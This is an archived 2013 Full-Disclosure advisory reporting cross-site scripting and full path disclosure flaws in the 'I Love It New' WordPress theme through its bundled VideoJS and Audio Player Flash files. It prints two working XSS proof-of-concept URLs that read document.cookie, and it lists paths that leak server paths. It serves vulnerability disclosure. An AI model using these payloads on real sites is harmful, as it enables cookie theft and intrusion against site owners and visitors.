lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 23 May 2013 23:57:14 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: XSS and FPD vulnerabilities in I Love It New
	theme for WordPress

Hello list!

These are Cross-Site Scripting and Full path disclosure vulnerabilities in I 
Love It New theme for WordPress. This is commercial (premium) theme. Earlier 
I've wrote about vulnerabilities in VideoJS 
(http://seclists.org/fulldisclosure/2013/May/21) and in multiple web 
applications.

-------------------------
Affected products:
-------------------------

All versions of I Love It New theme for WordPress. The theme contains 
vulnerable versions of VideoJS and Audio Player.

Vulnerable are web applications which are using VideoJS Flash Component 
3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not 
vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be 
read in repository on github). Also there are bypass methods which work in 
the last version, but the developers haven't fixed them due to their low 
impact. So update to last version of VideoJS.swf.

-------------------------
Affected vendors:
-------------------------

CosmoThemes
http://cosmothemes.com

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveitnew/videojs/videojs/video-js.swf?readyFunction=alert(document.cookie)

http://site/wp-content/themes/iloveitnew/lib/php/assets/player.swf?playerID=\%22))}catch(e){alert(document.cookie)}//

Full path disclosure (WASC-13):

There are FPD vulnerabilities in index.php and almost all other php-files 
(in folder and subfolders).

http://site/wp-content/themes/iloveitnew/

http://site/wp-content/themes/iloveitnew/videojs/video-js.php

http://site/wp-content/themes/iloveitnew/videojs/admin.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ